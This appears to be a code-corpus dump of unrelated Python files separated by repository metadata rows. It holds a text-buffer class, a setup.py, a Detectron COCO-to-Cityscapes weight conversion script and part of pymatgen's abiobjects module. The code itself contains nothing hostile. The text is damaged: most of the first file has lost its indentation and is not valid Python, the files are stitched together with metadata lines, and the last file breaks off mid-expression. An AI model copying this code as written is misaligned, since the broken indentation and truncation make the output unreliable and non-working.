Delete selected text and return :class:`ClipboardData` instance.
"""
return self.copy_selection(_cut=True)
def newline(self, copy_margin=True):
"""
Insert a line ending at the current position.
"""
if copy_margin:
self.insert_text('\n' + self.document.leading_whitespace_in_current_line)
else:
self.insert_text('\n')
def insert_line_above(self, copy_margin=True):
"""
Insert a new line above the current one.
"""
if copy_margin:
insert = self.document.leading_whitespace_in_current_line + '\n'
else:
insert = '\n'
self.cursor_position += self.document.get_start_of_line_position()
self.insert_text(insert)
self.cursor_position -= 1
def insert_line_below(self, copy_margin=True):
"""
Insert a new line below the current one.
"""
if copy_margin:
insert = '\n' + self.document.leading_whitespace_in_current_line
else:
insert = '\n'
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(insert)
def insert_text(self, data, overwrite=False, move_cursor=True, fire_event=True):
"""
Insert characters at cursor position.
:param fire_event: Fire `on_text_insert` event. This is mainly used to
trigger autocompletion while typing.
"""
# In insert/text mode.
if overwrite:
# Don't overwrite the newline itself. Just before the line ending, it should act like insert mode.
overwritten_text = self.text[self.cursor_position:self.cursor_position+len(data)]
if '\n' in overwritten_text:
overwritten_text = overwritten_text[:overwritten_text.find('\n')]
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position+len(overwritten_text):]
else:
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position:]
if move_cursor:
self.cursor_position += len(data)
# Fire 'on_text_insert' event.
if fire_event:
self.on_text_insert.fire()
def paste_clipboard_data(self, data, before=False, count=1):
"""
Insert the data from the clipboard.
"""
assert isinstance(data, ClipboardData)
if data.type == SelectionType.CHARACTERS:
if before:
self.insert_text(data.text * count)
else:
self.cursor_right()
self.insert_text(data.text * count, fire_event=False)
self.cursor_left()
elif data.type == SelectionType.LINES:
if before:
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=False)
self.insert_text((data.text + '\n') * count, move_cursor=False)
else:
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(('\n' + data.text) * count, move_cursor=False, fire_event=False)
self.cursor_down()
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=True)
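    # Illustrative behaviour of the branches above (data assumed):
    # CHARACTERS data is inserted `count` times at the cursor (before=True)
    # or just after the current character (before=False); LINES data opens a
    # whole line above or below the current one, and with before=False the
    # cursor ends up on the first non-blank column of the pasted line.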
def undo(self):
        # Pop from the undo-stack until we find a text that is different from
        # the current text. (The current logic of `save_to_undo_stack` means
        # that the top of the undo stack is usually the same as the current
        # text, so in that case we have to pop twice.)
while self._undo_stack:
text, pos = self._undo_stack.pop()
if text != self.text:
# Push current text to redo stack.
self._redo_stack.append((self.text, self.cursor_position))
# Set new text/cursor_position.
self.document = Document(text, cursor_position=pos)
break
def redo(self):
if self._redo_stack:
# Copy current state on undo stack.
self.save_to_undo_stack(clear_redo_stack=False)
# Pop state from redo stack.
text, pos = self._redo_stack.pop()
self.document = Document(text, cursor_position=pos)
def validate(self):
"""
Returns `True` if valid.
"""
self.validation_error = None
# Validate first. If not valid, set validation exception.
if self.validator:
try:
self.validator.validate(self.document)
except ValidationError as e:
# Set cursor position (don't allow invalid values.)
cursor_position = e.index
self.cursor_position = min(max(0, cursor_position), len(self.text))
self.validation_error = e
return False
return True
def append_to_history(self):
"""
Append the current input to the history.
(Only if valid input.)
"""
# Validate first. If not valid, set validation exception.
if not self.validate():
return
        # Save at the tail of the history. (But don't if the last entry in
        # the history is already the same.)
if self.text and (not len(self.history) or self.history[-1] != self.text):
self.history.append(self.text)
def _search(self, search_state, include_current_position=False, count=1):
"""
Execute search. Return (working_index, cursor_position) tuple when this
search is applied. Returns `None` when this text cannot be found.
"""
assert isinstance(search_state, SearchState)
assert isinstance(count, int) and count > 0
text = search_state.text
direction = search_state.direction
ignore_case = search_state.ignore_case()
def search_once(working_index, document):
"""
Do search one time.
Return (working_index, document) or `None`
"""
if direction == IncrementalSearchDirection.FORWARD:
# Try find at the current input.
new_index = document.find(
text, include_current_position=include_current_position,
ignore_case=ignore_case)
if new_index is not None:
return (working_index,
Document(document.text, document.cursor_position + new_index))
else:
# No match, go forward in the history. (Include len+1 to wrap around.)
# (Here we should always include all cursor positions, because
# it's a different line.)
for i in range(working_index + 1, len(self._working_lines) + 1):
i %= len(self._working_lines)
document = Document(self._working_lines[i], 0)
new_index = document.find(text, include_current_position=True,
ignore_case=ignore_case)
if new_index is not None:
return (i, Document(document.text, new_index))
else:
# Try find at the current input.
new_index = document.find_backwards(
text, ignore_case=ignore_case)
if new_index is not None:
return (working_index,
Document(document.text, document.cursor_position + new_index))
else:
# No match, go back in the history. (Include -1 to wrap around.)
for i in range(working_index - 1, -2, -1):
i %= len(self._working_lines)
document = Document(self._working_lines[i], len(self._working_lines[i]))
new_index = document.find_backwards(
text, ignore_case=ignore_case)
if new_index is not None:
return (i, Document(document.text, len(document.text) + new_index))
# Do 'count' search iterations.
working_index = self.working_index
document = self.document
for i in range(count):
result = search_once(working_index, document)
if result is None:
return # Nothing found.
else:
working_index, document = result
return (working_index, document.cursor_position)
def document_for_search(self, search_state):
"""
Return a `Document` instance that has the text/cursor position for this
search, if we would apply it.
"""
search_result = self._search(search_state, include_current_position=True)
if search_result is None:
return self.document
else:
working_index, cursor_position = search_result
return Document(self._working_lines[working_index], cursor_position)
def apply_search(self, search_state, include_current_position=True, count=1):
"""
Return a `Document` instance that has the text/cursor position for this
search, if we would apply it.
"""
search_result = self._search(search_state,
include_current_position=include_current_position, count=count)
if search_result is not None:
working_index, cursor_position = search_result
self.working_index = working_index
self.cursor_position = cursor_position
def exit_selection(self):
self.selection_state = None
def open_in_editor(self, cli):
"""
Open code in editor.
:param cli: `CommandLineInterface` instance.
"""
if self.read_only():
raise EditReadOnlyBuffer()
# Write to temporary file
descriptor, filename = tempfile.mkstemp(self.tempfile_suffix)
os.write(descriptor, self.text.encode('utf-8'))
os.close(descriptor)
# Open in editor
# (We need to use `cli.run_in_terminal`, because not all editors go to
# the alternate screen buffer, and some could influence the cursor
# position.)
        success = cli.run_in_terminal(lambda: self._open_file_in_editor(filename))
        # Read content again.
        if success:
with open(filename, 'rb') as f:
text = f.read().decode('utf-8')
# Drop trailing newline. (Editors are supposed to add it at the
# end, but we don't need it.)
if text.endswith('\n'):
text = text[:-1]
self.document = Document(
text=text,
cursor_position=len(text))
# Clean up temp file.
os.remove(filename)
def _open_file_in_editor(self, filename):
"""
Call editor executable.
Return True when we received a zero return code.
"""
# If the 'EDITOR' environment variable has been set, use that one.
# Otherwise, fall back to the first available editor that we can find.
editor = os.environ.get('EDITOR')
editors = [
editor,
# Order of preference.
'/usr/bin/editor',
'/usr/bin/nano',
'/usr/bin/pico',
'/usr/bin/vi',
'/usr/bin/emacs',
]
for e in editors:
if e:
try:
returncode = subprocess.call([e, filename])
return returncode == 0
except OSError:
# Executable does not exist, try the next one.
pass
return False
def indent(buffer, from_row, to_row, count=1):
"""
Indent text of the `Buffer` object.
"""
current_row = buffer.document.cursor_position_row
line_range = range(from_row, to_row)
# Apply transformation.
new_text = buffer.transform_lines(line_range, lambda l: ' ' * count + l)
buffer.document = Document(
new_text,
Document(new_text).translate_row_col_to_index(current_row, 0))
# Go to the start of the line.
buffer.cursor_position += buffer.document.get_start_of_line_position(after_whitespace=True)
def unindent(buffer, from_row, to_row, count=1):
"""
Unindent text of the `Buffer` object.
"""
current_row = buffer.document.cursor_position_row
line_range = range(from_row, to_row)
def transform(text):
remove = ' ' * count
if text.startswith(remove):
return text[len(remove):]
else:
return text.lstrip()
# Apply transformation.
new_text = buffer.transform_lines(line_range, transform)
buffer.document = Document(
new_text,
Document(new_text).translate_row_col_to_index(current_row, 0))
# Go to the start of the line.
buffer.cursor_position += buffer.document.get_start_of_line_position(after_whitespace=True)
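# A minimal standalone sketch of the line transformation used by indent() and
# unindent() above, decoupled from the Buffer/Document classes so it can be
# tried in isolation (the helper name and prefix width are illustrative, not
# part of the library API):
def _indent_lines_sketch(text, from_row, to_row, prefix='    '):
    """Prefix each line in [from_row, to_row) the way indent() does."""
    lines = text.split('\n')
    for i in range(from_row, to_row):
        lines[i] = prefix + lines[i]
    return '\n'.join(lines)

# Example: indenting the first two of three lines.
assert _indent_lines_sketch('a\nb\nc', 0, 2) == '    a\n    b\nc'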
|
bsd-3-clause
| -6,038,432,106,492,722,000
| 35.223602
| 120
| 0.588698
| false
| 4.353631
| false
| false
| false
|
davidyack/Xrm.Tools.CRMWebAPI
|
python/setup.py
|
1
|
1265
|
#!/usr/bin/env python
'''The setup and build script for the python-crmwebapi library.'''
import os
from setuptools import setup, find_packages
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
setup(
name='xrm-tools-crmwebapi',
version='1.0',
author='Xrm.Tools',
author_email='',
license='MIT',
url='https://github.com/davidyack/Xrm.Tools.CRMWebAPI',
keywords='crmwebapi',
description='A Python version of CRMWebAPI',
long_description=(read('README.rst')),
packages=find_packages(exclude=['tests*']),
install_requires=['future', 'requests'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
)
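# Illustrative local install/build commands once this setup script is in place
# (standard setuptools usage, not specific to this package):
#
#   pip install .            # install from the repository root
#   python setup.py sdist    # build a source distribution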
|
mit
| -3,837,700,705,353,445,400
| 30.625
| 71
| 0.621344
| false
| 4.041534
| false
| false
| false
|
facebookresearch/Detectron
|
tools/convert_coco_model_to_cityscapes.py
|
1
|
4289
|
#!/usr/bin/env python
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
# Convert a detection model trained for COCO into a model that can be fine-tuned
# on cityscapes
#
# cityscapes_to_coco
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import numpy as np
import os
import sys
import detectron.datasets.coco_to_cityscapes_id as cs
from detectron.utils.io import load_object
from detectron.utils.io import save_object
NUM_CS_CLS = 9
NUM_COCO_CLS = 81
def parse_args():
parser = argparse.ArgumentParser(
description='Convert a COCO pre-trained model for use with Cityscapes')
parser.add_argument(
'--coco_model', dest='coco_model_file_name',
help='Pretrained network weights file path',
default=None, type=str)
parser.add_argument(
'--convert_func', dest='convert_func',
help='Blob conversion function',
default='cityscapes_to_coco', type=str)
parser.add_argument(
'--output', dest='out_file_name',
help='Output file path',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def convert_coco_blobs_to_cityscape_blobs(model_dict, convert_func):
    # Take convert_func explicitly instead of reading the module-level `args`,
    # so the function also works when this script is imported.
for k, v in model_dict['blobs'].items():
if v.shape[0] == NUM_COCO_CLS or v.shape[0] == 4 * NUM_COCO_CLS:
coco_blob = model_dict['blobs'][k]
print(
'Converting COCO blob {} with shape {}'.
format(k, coco_blob.shape)
)
cs_blob = convert_coco_blob_to_cityscapes_blob(
                coco_blob, convert_func
)
print(' -> converted shape {}'.format(cs_blob.shape))
model_dict['blobs'][k] = cs_blob
def convert_coco_blob_to_cityscapes_blob(coco_blob, convert_func):
# coco blob (81, ...) or (81*4, ...)
coco_shape = coco_blob.shape
leading_factor = int(coco_shape[0] / NUM_COCO_CLS)
tail_shape = list(coco_shape[1:])
assert leading_factor == 1 or leading_factor == 4
# Reshape in [num_classes, ...] form for easier manipulations
coco_blob = coco_blob.reshape([NUM_COCO_CLS, -1] + tail_shape)
# Default initialization uses Gaussian with mean and std to match the
# existing parameters
std = coco_blob.std()
mean = coco_blob.mean()
cs_shape = [NUM_CS_CLS] + list(coco_blob.shape[1:])
cs_blob = (np.random.randn(*cs_shape) * std + mean).astype(np.float32)
# Replace random parameters with COCO parameters if class mapping exists
for i in range(NUM_CS_CLS):
coco_cls_id = getattr(cs, convert_func)(i)
if coco_cls_id >= 0: # otherwise ignore (rand init)
cs_blob[i] = coco_blob[coco_cls_id]
cs_shape = [NUM_CS_CLS * leading_factor] + tail_shape
return cs_blob.reshape(cs_shape)
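# Worked example of the reshape arithmetic above (shapes are illustrative):
# a COCO cls_score weight of shape (81, 1024) has leading_factor 1 and maps to
# a Cityscapes blob of shape (9, 1024); a bbox_pred weight of shape (324, 1024)
# has leading_factor 4 (324 = 81 * 4) and maps to (36, 1024).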
def remove_momentum(model_dict):
    # Copy the keys: deleting entries while iterating over the live view
    # raises a RuntimeError on Python 3.
    for k in list(model_dict['blobs'].keys()):
if k.endswith('_momentum'):
del model_dict['blobs'][k]
def load_and_convert_coco_model(args):
model_dict = load_object(args.coco_model_file_name)
remove_momentum(model_dict)
    convert_coco_blobs_to_cityscape_blobs(model_dict, args.convert_func)
return model_dict
if __name__ == '__main__':
args = parse_args()
print(args)
assert os.path.exists(args.coco_model_file_name), \
'Weights file does not exist'
weights = load_and_convert_coco_model(args)
save_object(weights, args.out_file_name)
print('Wrote blobs to {}:'.format(args.out_file_name))
print(sorted(weights['blobs'].keys()))
|
apache-2.0
| -572,377,124,243,045,500
| 32.507813
| 80
| 0.639543
| false
| 3.433947
| false
| false
| false
|
rousseab/pymatgen
|
pymatgen/io/abinitio/abiobjects.py
|
1
|
42855
|
# coding: utf-8
"""
Low-level objects providing an abstraction for the objects involved in the calculation.
"""
from __future__ import unicode_literals, division, print_function
import collections
import abc
import six
import numpy as np
import pymatgen.core.units as units
from pprint import pformat
from monty.design_patterns import singleton
from monty.collections import AttrDict
from pymatgen.core.design_patterns import Enum
from pymatgen.serializers.json_coders import PMGSONable, pmg_serialize
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from monty.json import MontyEncoder, MontyDecoder
def contract(s):
"""
>>> assert contract("1 1 1 2 2 3") == "3*1 2*2 1*3"
>>> assert contract("1 1 3 2 3") == "2*1 1*3 1*2 1*3"
"""
if not s: return s
tokens = s.split()
old = tokens[0]
count = [[1, old]]
for t in tokens[1:]:
if t == old:
count[-1][0] += 1
else:
old = t
count.append([1, t])
return " ".join("%d*%s" % (c, t) for c, t in count)
class AbivarAble(six.with_metaclass(abc.ABCMeta, object)):
"""
An `AbivarAble` object provides a method `to_abivars`
that returns a dictionary with the abinit variables.
"""
@abc.abstractmethod
def to_abivars(self):
"""Returns a dictionary with the abinit variables."""
#@abc.abstractmethod
#def from_abivars(cls, vars):
# """Build the object from a dictionary with Abinit variables."""
def __str__(self):
return pformat(self.to_abivars(), indent=1, width=80, depth=None)
def __contains__(self, key):
return key in self.to_abivars()
@singleton
class MandatoryVariable(object):
"""
Singleton used to tag mandatory variables, just because I can use
the cool syntax: variable is MANDATORY!
"""
@singleton
class DefaultVariable(object):
"""Singleton used to tag variables that will have the default value"""
MANDATORY = MandatoryVariable()
DEFAULT = DefaultVariable()
class SpinMode(collections.namedtuple('SpinMode', "mode nsppol nspinor nspden"), AbivarAble, PMGSONable):
"""
Different configurations of the electron density as implemented in abinit:
    One can construct the object via SpinMode.as_spinmode(string),
    where string can assume the values:
- polarized
- unpolarized
- afm (anti-ferromagnetic)
- spinor (non-collinear magnetism)
- spinor_nomag (non-collinear, no magnetism)
"""
@classmethod
def as_spinmode(cls, obj):
"""Converts obj into a `SpinMode` instance"""
if isinstance(obj, cls):
return obj
else:
# Assume a string with mode
try:
return _mode2spinvars[obj]
except KeyError:
raise KeyError("Wrong value for spin_mode: %s" % str(obj))
def to_abivars(self):
return {
"nsppol": self.nsppol,
"nspinor": self.nspinor,
"nspden": self.nspden,
}
@pmg_serialize
def as_dict(self):
return {k: getattr(self, k) for k in self._fields}
@classmethod
def from_dict(cls, d):
return cls(**{k: d[k] for k in d if k in cls._fields})
# A handy Multiton
_mode2spinvars = {
"unpolarized": SpinMode("unpolarized", 1, 1, 1),
"polarized": SpinMode("polarized", 2, 1, 2),
"afm": SpinMode("afm", 1, 1, 2),
"spinor": SpinMode("spinor", 1, 2, 4),
"spinor_nomag": SpinMode("spinor_nomag", 1, 2, 1),
}
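# Illustrative usage of the table above (doctest-style, consistent with the
# definitions in this module):
#
#   >>> afm = SpinMode.as_spinmode("afm")
#   >>> afm.to_abivars()
#   {'nsppol': 1, 'nspinor': 1, 'nspden': 2}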
class Smearing(AbivarAble, PMGSONable):
"""
    Variables defining the smearing technique. The preferred way to instantiate
a `Smearing` object is via the class method Smearing.as_smearing(string)
"""
#: Mapping string_mode --> occopt
_mode2occopt = {
'nosmearing': 1,
'fermi_dirac': 3,
'marzari4': 4,
'marzari5': 5,
'methfessel': 6,
'gaussian': 7}
def __init__(self, occopt, tsmear):
self.occopt = occopt
self.tsmear = tsmear
def __str__(self):
s = "occopt %d # %s Smearing\n" % (self.occopt, self.mode)
if self.tsmear:
s += 'tsmear %s' % self.tsmear
return s
def __eq__(self, other):
return (self.occopt == other.occopt and
np.allclose(self.tsmear, other.tsmear))
def __ne__(self, other):
return not self == other
def __bool__(self):
return self.mode != "nosmearing"
# py2 old version
__nonzero__ = __bool__
@classmethod
def as_smearing(cls, obj):
"""
Constructs an instance of `Smearing` from obj. Accepts obj in the form:
* Smearing instance
* "name:tsmear" e.g. "gaussian:0.004" (Hartree units)
* "name:tsmear units" e.g. "gaussian:0.1 eV"
* None --> no smearing
"""
if obj is None:
return Smearing.nosmearing()
if isinstance(obj, cls):
return obj
# obj is a string
if obj == "nosmearing":
return cls.nosmearing()
else:
obj, tsmear = obj.split(":")
            obj = obj.strip()  # strip() returns a new string; keep the result.
occopt = cls._mode2occopt[obj]
try:
tsmear = float(tsmear)
except ValueError:
tsmear, unit = tsmear.split()
tsmear = units.Energy(float(tsmear), unit).to("Ha")
return cls(occopt, tsmear)
@property
def mode(self):
for (mode_str, occopt) in self._mode2occopt.items():
if occopt == self.occopt:
return mode_str
raise AttributeError("Unknown occopt %s" % self.occopt)
@staticmethod
def nosmearing():
return Smearing(1, 0.0)
def to_abivars(self):
if self.mode == "nosmearing":
return {"occopt": 1, "tsmear": 0.0}
else:
return {"occopt": self.occopt, "tsmear": self.tsmear,}
@pmg_serialize
def as_dict(self):
"""json friendly dict representation of Smearing"""
return {"occopt": self.occopt, "tsmear": self.tsmear}
@staticmethod
def from_dict(d):
return Smearing(d["occopt"], d["tsmear"])
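# Illustrative string forms accepted by Smearing.as_smearing (tsmear values
# follow from the parsing logic above; 0.1 eV ~ 0.00367 Ha):
#
#   Smearing.as_smearing("fermi_dirac:0.01")   # occopt 3, tsmear 0.01 Ha
#   Smearing.as_smearing("gaussian:0.1 eV")    # occopt 7, tsmear ~0.00367 Ha
#   Smearing.as_smearing(None)                 # no smearing, occopt 1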
class ElectronsAlgorithm(dict, AbivarAble, PMGSONable):
"""Variables controlling the SCF/NSCF algorithm."""
# None indicates that we use abinit defaults.
_DEFAULT = dict(
iprcell=None, iscf=None, diemac=None, diemix=None, diemixmag=None,
dielam=None, diegap=None, dielng=None, diecut=None, nstep=50)
def __init__(self, *args, **kwargs):
super(ElectronsAlgorithm, self).__init__(*args, **kwargs)
for k in self:
if k not in self._DEFAULT:
raise ValueError("%s: No default value has been provided for "
"key %s" % (self.__class__.__name__, k))
def to_abivars(self):
return self.copy()
@pmg_serialize
def as_dict(self):
return self.copy()
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop("@module", None)
d.pop("@class", None)
return cls(**d)
class Electrons(AbivarAble, PMGSONable):
"""The electronic degrees of freedom"""
def __init__(self, spin_mode="polarized", smearing="fermi_dirac:0.1 eV",
algorithm=None, nband=None, fband=None, charge=0.0, comment=None): # occupancies=None,
"""
Constructor for Electrons object.
Args:
            spin_mode: Spin polarization mode (string or :class:`SpinMode` instance).
            smearing: Smearing technique (string or :class:`Smearing` instance).
            algorithm: :class:`ElectronsAlgorithm` instance with the SCF/NSCF variables.
            nband: Number of bands (abinit nband variable).
            fband: Abinit fband input variable.
            charge: Total charge of the system. Default is 0.
            comment: String comment for Electrons
"""
super(Electrons, self).__init__()
self.comment = comment
self.smearing = Smearing.as_smearing(smearing)
self.spin_mode = SpinMode.as_spinmode(spin_mode)
self.nband = nband
self.fband = fband
self.charge = charge
self.algorithm = algorithm
@property
def nsppol(self):
return self.spin_mode.nsppol
@property
def nspinor(self):
return self.spin_mode.nspinor
@property
def nspden(self):
return self.spin_mode.nspden
def as_dict(self):
"json friendly dict representation"
d = {}
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["spin_mode"] = self.spin_mode.as_dict()
d["smearing"] = self.smearing.as_dict()
d["algorithm"] = self.algorithm.as_dict() if self.algorithm else None
d["nband"] = self.nband
d["fband"] = self.fband
d["charge"] = self.charge
d["comment"] = self.comment
return d
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop("@module", None)
d.pop("@class", None)
dec = MontyDecoder()
d["spin_mode"] = dec.process_decoded(d["spin_mode"])
d["smearing"] = dec.process_decoded(d["smearing"])
d["algorithm"] = dec.process_decoded(d["algorithm"]) if d["algorithm"] else None
return cls(**d)
def to_abivars(self):
abivars = self.spin_mode.to_abivars()
abivars.update({
"nband" : self.nband,
"fband" : self.fband,
"charge" : self.charge,
})
if self.smearing:
abivars.update(self.smearing.to_abivars())
if self.algorithm:
abivars.update(self.algorithm)
#abivars["#comment"] = self.comment
return abivars
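# Illustrative: the default Electrons() merges the spin, band and smearing
# variables (values follow from the defaults above; 0.1 eV ~ 0.00367 Ha):
#
#   Electrons().to_abivars()
#   # -> {'nsppol': 2, 'nspinor': 1, 'nspden': 2, 'nband': None,
#   #     'fband': None, 'charge': 0.0, 'occopt': 3, 'tsmear': ~0.00367}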
class KSampling(AbivarAble, PMGSONable):
"""
Input variables defining the K-point sampling.
"""
# Modes supported by the constructor.
modes = Enum(('monkhorst', 'path', 'automatic',))
def __init__(self, mode="monkhorst", num_kpts= 0, kpts=((1, 1, 1),), kpt_shifts=(0.5, 0.5, 0.5),
kpts_weights=None, use_symmetries=True, use_time_reversal=True, chksymbreak=None,
comment=None):
"""
Highly flexible constructor for KSampling objects. The flexibility comes
at the cost of usability and in general, it is recommended that you use
the default constructor only if you know exactly what you are doing and
        require the flexibility. For most use cases, the object can be constructed
far more easily using the convenience static constructors:
#. gamma_only
#. gamma_centered
#. monkhorst
#. monkhorst_automatic
#. path
and it is recommended that you use those.
Args:
            mode: Mode for generating k-points. Use one of the KSampling.modes enum types.
num_kpts: Number of kpoints if mode is "automatic"
                Number of divisions for the sampling of the smallest segment if mode is "path".
Not used for the other modes
kpts: Number of divisions. Even when only a single specification is
required, e.g. in the automatic scheme, the kpts should still
be specified as a 2D array. e.g., [[20]] or [[2,2,2]].
kpt_shifts: Shifts for Kpoints.
use_symmetries: False if spatial symmetries should not be used
to reduce the number of independent k-points.
use_time_reversal: False if time-reversal symmetry should not be used
to reduce the number of independent k-points.
kpts_weights: Optional weights for kpoints. For explicit kpoints.
chksymbreak: Abinit input variable: check whether the BZ sampling preserves the symmetry of the crystal.
comment: String comment for Kpoints
.. note::
The default behavior of the constructor is monkhorst.
"""
if mode not in KSampling.modes:
raise ValueError("Unknown kpoint mode %s" % mode)
super(KSampling, self).__init__()
self.mode = mode
self.comment = comment
self.num_kpts = num_kpts
self.kpts = kpts
self.kpt_shifts = kpt_shifts
self.kpts_weights = kpts_weights
self.use_symmetries = use_symmetries
self.use_time_reversal = use_time_reversal
self.chksymbreak = chksymbreak
abivars = {}
if mode in ("monkhorst",):
assert num_kpts == 0
ngkpt = np.reshape(kpts, 3)
shiftk = np.reshape(kpt_shifts, (-1,3))
if use_symmetries and use_time_reversal: kptopt = 1
if not use_symmetries and use_time_reversal: kptopt = 2
if not use_symmetries and not use_time_reversal: kptopt = 3
if use_symmetries and not use_time_reversal: kptopt = 4
abivars.update({
"ngkpt" : ngkpt,
"shiftk" : shiftk,
"nshiftk" : len(shiftk),
"kptopt" : kptopt,
"chksymbreak": chksymbreak,
})
elif mode in ("path",):
if num_kpts <= 0:
raise ValueError("For Path mode, num_kpts must be specified and >0")
kptbounds = np.reshape(kpts, (-1,3))
#print("in path with kptbound: %s " % kptbounds)
abivars.update({
"ndivsm" : num_kpts,
"kptbounds": kptbounds,
"kptopt" : -len(kptbounds)+1,
})
elif mode in ("automatic",):
kpts = np.reshape(kpts, (-1,3))
if len(kpts) != num_kpts:
                raise ValueError("For automatic mode, num_kpts must equal the number of kpts given.")
kptnrm = np.ones(num_kpts)
abivars.update({
"kptopt" : 0,
"kpt" : kpts,
"nkpt" : num_kpts,
"kptnrm" : kptnrm,
"wtk" : kpts_weights, # for iscf/=-2, wtk.
"chksymbreak": chksymbreak,
})
else:
raise ValueError("Unknown mode %s" % mode)
self.abivars = abivars
#self.abivars["#comment"] = comment
@property
def is_homogeneous(self):
return self.mode not in ["path"]
@classmethod
def gamma_only(cls):
"""Gamma-only sampling"""
return cls(kpt_shifts=(0.0,0.0,0.0), comment="Gamma-only sampling")
@classmethod
def gamma_centered(cls, kpts=(1, 1, 1), use_symmetries=True, use_time_reversal=True):
"""
Convenient static constructor for an automatic Gamma centered Kpoint grid.
Args:
kpts: Subdivisions N_1, N_2 and N_3 along reciprocal lattice vectors.
use_symmetries: False if spatial symmetries should not be used
to reduce the number of independent k-points.
use_time_reversal: False if time-reversal symmetry should not be used
to reduce the number of independent k-points.
Returns:
:class:`KSampling` object.
"""
return cls(kpts=[kpts], kpt_shifts=(0.0, 0.0, 0.0),
use_symmetries=use_symmetries, use_time_reversal=use_time_reversal,
comment="gamma-centered mode")
@classmethod
def monkhorst(cls, ngkpt, shiftk=(0.5, 0.5, 0.5), chksymbreak=None, use_symmetries=True,
use_time_reversal=True, comment=None):
"""
Convenient static constructor for a Monkhorst-Pack mesh.
Args:
ngkpt: Subdivisions N_1, N_2 and N_3 along reciprocal lattice vectors.
shiftk: Shift to be applied to the kpoints.
use_symmetries: Use spatial symmetries to reduce the number of k-points.
use_time_reversal: Use time-reversal symmetry to reduce the number of k-points.
Returns:
:class:`KSampling` object.
"""
return cls(
kpts=[ngkpt], kpt_shifts=shiftk,
use_symmetries=use_symmetries, use_time_reversal=use_time_reversal, chksymbreak=chksymbreak,
comment=comment if comment else "Monkhorst-Pack scheme with user-specified shiftk")
@classmethod
def monkhorst_automatic(cls, structure, ngkpt,
use_symmetries=True, use_time_reversal=True, chksymbreak=None, comment=None):
"""
Convenient static constructor for an automatic Monkhorst-Pack mesh.
Args:
structure: :class:`Structure` object.
ngkpt: Subdivisions N_1, N_2 and N_3 along reciprocal lattice vectors.
use_symmetries: Use spatial symmetries to reduce the number of k-points.
use_time_reversal: Use time-reversal symmetry to reduce the number of k-points.
Returns:
:class:`KSampling` object.
"""
sg = SpacegroupAnalyzer(structure)
#sg.get_crystal_system()
#sg.get_point_group()
# TODO
nshiftk = 1
#shiftk = 3*(0.5,) # this is the default
shiftk = 3*(0.5,)
#if lattice.ishexagonal:
#elif lattice.isbcc
#elif lattice.isfcc
return cls.monkhorst(
ngkpt, shiftk=shiftk, use_symmetries=use_symmetries, use_time_reversal=use_time_reversal,
chksymbreak=chksymbreak, comment=comment if comment else "Automatic Monkhorst-Pack scheme")
@classmethod
def _path(cls, ndivsm, structure=None, kpath_bounds=None, comment=None):
"""
Static constructor for path in k-space.
Args:
structure: :class:`Structure` object.
kpath_bounds: List with the reduced coordinates of the k-points defining the path.
            ndivsm: Number of divisions for the smallest segment.
comment: Comment string.
Returns:
:class:`KSampling` object.
"""
if kpath_bounds is None:
# Compute the boundaries from the input structure.
from pymatgen.symmetry.bandstructure import HighSymmKpath
sp = HighSymmKpath(structure)
            # Flatten the array, since "path" is a list of lists!
kpath_labels = []
for labels in sp.kpath["path"]:
kpath_labels.extend(labels)
kpath_bounds = []
for label in kpath_labels:
red_coord = sp.kpath["kpoints"][label]
#print("label %s, red_coord %s" % (label, red_coord))
kpath_bounds.append(red_coord)
return cls(mode=KSampling.modes.path, num_kpts=ndivsm, kpts=kpath_bounds,
comment=comment if comment else "K-Path scheme")
@classmethod
def path_from_structure(cls, ndivsm, structure):
"""See _path for the meaning of the variables"""
return cls._path(ndivsm, structure=structure, comment="K-path generated automatically from structure")
@classmethod
def explicit_path(cls, ndivsm, kpath_bounds):
"""See _path for the meaning of the variables"""
return cls._path(ndivsm, kpath_bounds=kpath_bounds, comment="Explicit K-path")
@classmethod
def automatic_density(cls, structure, kppa, chksymbreak=None, use_symmetries=True, use_time_reversal=True,
shifts=(0.5, 0.5, 0.5)):
"""
Returns an automatic Kpoint object based on a structure and a kpoint
density. Uses Gamma centered meshes for hexagonal cells and Monkhorst-Pack grids otherwise.
Algorithm:
Uses a simple approach scaling the number of divisions along each
            reciprocal lattice vector proportionally to its length.
Args:
structure: Input structure
kppa: Grid density
"""
lattice = structure.lattice
lengths = lattice.abc
ngrid = kppa / structure.num_sites
mult = (ngrid * lengths[0] * lengths[1] * lengths[2]) ** (1 / 3.)
num_div = [int(round(1.0 / lengths[i] * mult)) for i in range(3)]
# ensure that num_div[i] > 0
num_div = [i if i > 0 else 1 for i in num_div]
angles = lattice.angles
hex_angle_tol = 5 # in degrees
hex_length_tol = 0.01 # in angstroms
right_angles = [i for i in range(3) if abs(angles[i] - 90) < hex_angle_tol]
hex_angles = [i for i in range(3)
if abs(angles[i] - 60) < hex_angle_tol or
abs(angles[i] - 120) < hex_angle_tol]
is_hexagonal = (len(right_angles) == 2 and len(hex_angles) == 1
